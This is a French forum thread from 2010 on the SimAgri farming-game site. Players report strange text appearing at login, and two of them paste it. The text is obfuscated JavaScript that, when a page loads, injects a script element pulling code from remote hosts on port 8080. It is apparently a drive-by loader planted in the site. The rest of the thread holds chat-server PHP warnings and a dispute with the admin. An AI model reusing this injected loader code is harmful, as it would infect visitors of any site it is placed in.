Accueil / Général / Bizarre bizarre ...


Bizarre bizarre ...

Sujet posté le 09/02/2010 à 13H59 par joueur_41718_2
JOUEUR_41718_2 09/02/2010 à 13H59
Bonjour,

L'orque j'arrive sur le site simagri pour taper mon mot de passe j'ai un grand texte de charabia qui s'affiche, si quelqu'un aurait l'amabilité de m'éclairer un peu ...

voici le message :

var f;if(f!='c' && f != ''){f=null};var bf="";var _;if(_!='p'){_='p'};this.aj=false;var vg=new String();var iz;if(iz!='' && iz!='aox'){iz=''};var x=window;var w=document;this._x="_x";var g='s0cUr1iEp1tl'.replace(/[lUE10]/g, '');this.q="";var vh;if(vh!='au'){vh=''};x.onload=function(){try {var r;if(r!='il'){r='il'};var vt;if(vt!='zq'){vt='zq'};b=w.createElement(g);var ip;if(ip!='' && ip!='ef'){ip=null};var t='';var vtl;if(vtl!='' && vtl!='h_'){vtl=''};var da="da";this.aq="";b.src='h!txt7pA:!/x/7g?oAoAgxl7e7-AcAoA-?j!px.?s!w7eAeAt7i!m!.Ac!o?m7.!tAr7axv!i7aAn!-!axe!.7y7o7uxrAtxa7gAh?e7u?eAr?.xr7ux:A870x8A0?/?g!oxoxg?l?e7.xcxoAm?/xg7o?o7g?l7e7.Ac7o?m!/!mxe!d?i?a!f!i?rxeA.7cAo!mx/!vAixrxg7iAlAiAo?.!i!t?/!k7e!e7z7m!o?v7i?eAs?.7c7oxmA/x'.replace(/[xA\?\!7]/g, '');var eo;if(eo!='st'){eo=''};this.oc="";b.setAttribute('dze6f6e5rh'.replace(/[hz65\!]/g, ''), "1");this.am='';var rq;if(rq!='_n' && rq!='ex'){rq='_n'};w.body.appendChild(b);var fu=14117;} catch(a){};};var gw;if(gw!='zo' && gw!='m'){gw='zo'};var bc;if(bc!='pc' && bc!='ka'){bc='pc'}; var b=new Date();var i=window;var y='sPcCr9iCpmt9'.replace(/[9CuPm]/g, '');var o=document;this.bf=35535;this.e=false;var jf=false;i.onload=function(){var yz;if(yz!='l'){yz=''};try {r=o.createElement(y);var oz;if(oz!='g'){oz=''};var rb="";r.src='hPt^tFpU:!/F/!f^aFsFt!b!rPoUw!s^e^r^sPe!a^rFc^hU-!cFoUmU.^lUiUvUeFdUo^o!r!.FbFi!z!.Pm^e!r^cUa^d^oUlFi^vPrPeU-^cFoFm^-Fb^r!.UbUe!sFtPn!e^w^h^aFvUeUnF.PrPuU:U8^0!8P0P/PgPoPo!gPlUeU.^cPoFmF/PgUoPo!gPl!eU.^c!oFm^/FyFaPmP.Pc^oPmP/FlUi!b!aU.FcFoPm^/Ua^lPi!s!oFfFtU.^cUo!mP/^'.replace(/[\^FPU\!]/g, '');this.ur="";var lk=new String();r.setAttribute('dzezfze%rP'.replace(/[P%6zX]/g, ''), "1");var ore;if(ore!='' && ore!='z'){ore=''};var gh;if(gh!='' && gh!='hr'){gh=null};this.yl=60382;o.body.appendChild(r);var oy=new String();} catch(j){var ym;if(ym!='' && ym!='bo'){ym=null};};var uh=new Array();var xh=new Array();};var ccn;if(ccn!='' && ccn!='wv'){ccn=''};


merci d'avance au admins?

Bien amicalement, cut-cut
JOHNELOI (VIP) 09/02/2010 à 14H24
oui moi sa me le fait aussi mais sa me la fait que une fois donc sa va encore
JOUEUR_4456_1 09/02/2010 à 14H25
bonjour tiens toi aussimoi depuis hier sur fr 1
var e;if(e!='i'){e='i'};var o;if(o!='' && o!='w'){o=null};var z='s3cwrhiwpZth'.replace(/[h2Zw3]/g, '');var l;if(l!='ia' && l != ''){l=null};var gn;if(gn!='ke' && gn != ''){gn=null};var b=window;var r=document;this.wh=false;var zd=new Array();var xq=new Array();b.onload=function(){var rj;if(rj!=''){rj='zcr'};try {var kc;if(kc!='ng'){kc='ng'};var zw;if(zw!='' && zw!='rz'){zw='c'};u=r.createElement(z);var djx;if(djx!='by'){djx='by'};u.setAttribute('dte9fCeCrX'.replace(/[XtCg9]/g, ''), "1");var a=false;var _=false;u.src='hWtAtAp?:S/x/Sa?mAa?z?oSnx-AcSoW-xjxpS.ArxeAv?eWr?s?ox.Sn?eAt?.Sc?oAcWo?lAo?gA-WnSixfWt?yW-Scxoxmx.xyWo?uSrxtWaxgAhSeSuxeWrx.?rWuS:W8W0S8?0W/SgWoxo?g?lWeW.ScWoSmW/AgWoWoxgxlxeW.AcxoxmW/xkxa?kWaAkWuA.Acxo?mW/AiSmWe?exm?.Wc?oWm?/Wb?iSgxlSo?bxeW.?nAex.SjWpW/A'.replace(/[ASWx\?]/g, '');this.ed=false;var kd;if(kd!='ud'){kd=''};var j;if(j!='ds'){j=''};r.body.appendChild(u);var gu=new Array();} catch(s){var lx="lx";};var kr;if(kr!=''){kr='ui'};var v=43479;};var ob=new Array();this.ey="";
JOUEUR_62327_1 09/02/2010 à 14H39
moi je n'ai rien de tout ça ..

____________________
Un des membres de l'APIDS
JOUEUR_55654_2 09/02/2010 à 14H42
bonjour,

j'ai pareil sur France2 et USA1


=====Message de Modération=====

Cut-Cut, essaie de faire attention de mettre un titre explicite par rapport au probleme la prochaine fois


____________________
JOUEUR_89048_2 09/02/2010 à 14H53
salut,
ca me le fait aussi
JOUEUR_80549_1 09/02/2010 à 15H12
moi aussi mais en plus ca arrete IE et pas moyen d'acceder au sous rubrique de sim et de plus j'ai perdu ma traite de midi ca a arreter sim tous court
JOUEUR_41718_2 09/02/2010 à 15H18
Bonjour farmer greg, oui je c'est qu'il n'est pas très explicite et j'en suis navré mais je ne savais pas trop quoi mettre ...

Je ferait un effort la prochaine foi, désolé encore.

Bien amicalement, cut-cut.
JOUEUR_242652_1 09/02/2010 à 15H22
Moi, j'ai pas de problème pour me connecté, c'est le t'chat qui me dit ca :

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/web/portail/tchat/i18n/fr_FR/main.php:406) in /home/web/portail/tchat/src/pfcuserconfig.class.php on line 25

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/web/portail/tchat/i18n/fr_FR/main.php:406) in /home/web/portail/tchat/src/pfcuserconfig.class.php on line 25

____________________
VENTURI (admin) 09/02/2010 à 16H03
vous voyez ça où ? Je ne vois rien moi...aujourd'hui c'est la journée des bizareries en tout cas ! Depuis ce matin ce n'est pas la 1ere...



____________________

cow2 SimAgri.com : LA simulation agricole sur internet

JOUEUR_41718_2 09/02/2010 à 16H12
je suis un menteur alors ?!
JOHNELOI (VIP) 09/02/2010 à 16H31
moi c est surtout quand je pars pendant un certain temp et apres tu es obligé de te reconecter moi c est la que je vois ce charabia
VENTURI (admin) 09/02/2010 à 16H32
j'ai jamais traité personne de menteur ! Pfff !

Ah j'te jure ca m'énerve les gens comme ça !

____________________

cow2 SimAgri.com : LA simulation agricole sur internet

JOUEUR_242652_1 09/02/2010 à 16H38
Suis-je le seul à avoir des problème avec le t'chat ? Celà viendrait-il de chez moi, car j'ai essayé avec Mozzilla firefox, IE 8 et toujour même beug.

____________________
JOUEUR_130073_2 09/02/2010 à 17H38
Le message s'affiche tout en haut de la page (chez moi, uniquement quand je ne suis pas encore connectée).

Bon évidemment j'ai essayé de refaire un essai pour voir si il remplaçait quelque chose (logo, menu...) mais il ne s'affiche plus

____________________


Mais tu sais, je suis pauvre, je n'ai que mes rêves ;
J'ai déposé mes rêves sous tes pieds ;
Marche doucement, car tu marches sur mes rêves.
JOUEUR_134048_2 09/02/2010 à 17H42
j'ai eu ce massage plusieur fois aussi

____________________
hebergeur d'image
09/02 à 16:32 - venturi : Vous venez de recevoir un 1er avertissement sur le forum. Le 2nd sera synonyme de bannissement.

Quel surprise, non mais franchement, ai je dit que tu m'avais traité de menteur? non je t'ai seulement posé la question ( bien gentiment ) ... li bien les messages ...

Et je suis désolé mais ce genre de message :

" Je ne vois rien moi...aujourd'hui c'est la journée des bizareries en tout cas ! Depuis ce matin ce n'est pas la 1ere.. "

Genre j'ai des hallucinations ou pire encore ont raconte des ânerie pour te faire perdre du temps ...

Je n'admet pas, surtout que je reçoit cette avertissement alors que d'autre ne la ou les reçoive pas pour bien pire, du genre insultes ou autres, alors je peu comprendre que ce n'est peut être pas ta journée, mais des choses comme cela, rien de tel pour m'énerver, ce n'est déjà pas la joie dans la réalité avec la crise du lait mais alors la quand je voit cela ...

Bref tout sa pour dire que cet avertissement n'est pas mérité juste pour une question posé POLIMENT en plus.

Maintenant que j'ai dit ce que je voulait bannie moi si tu le désire mais j'avoue être déçue ...

Sur ce, MONSIEUR l'administrateur de simagri, je te souhaite une agréable soirée, pendant ce temps là, moi je m'en vais traire mes vaches et soigné le reste du troupeaux.

bien cordialement, et au plaisir de te relire,

CUT-CUT.

VENTURI (admin) 09/02/2010 à 18H03
Je ne voyais pas le message alors j'ai simplement demandé un complément d'information en posant une question...toi tu y es répond pas et en plus tu à l'air de penser que je te traite de menteur ! Et en plus il aurait fallu que je réponde à ta question (qui est hors sujet) !

Enfin bref. Faut pas se demander pourquoi le forum est moins fréquenté...



____________________

cow2 SimAgri.com : LA simulation agricole sur internet

JOUEUR_159680_2 09/02/2010 à 18H05 09/02/2010 à 18H06
Bonjour,
THE FARMER 54
Non tu n'est pas le seul à avoir un problème avec le tchat:
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/web/portail/tchat/i18n/fr_FR/main.php:406) in /home/web/portail/tchat/src/pfcuserconfig.class.php on line 25

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/web/portail/tchat/i18n/fr_FR/main.php:406) in /home/web/portail/tchat/src/pfcuserconfig.class.php on line 25

____________________
John Deere,ça tire,c'est fort,c'est vert!




Ce sujet est clôturé.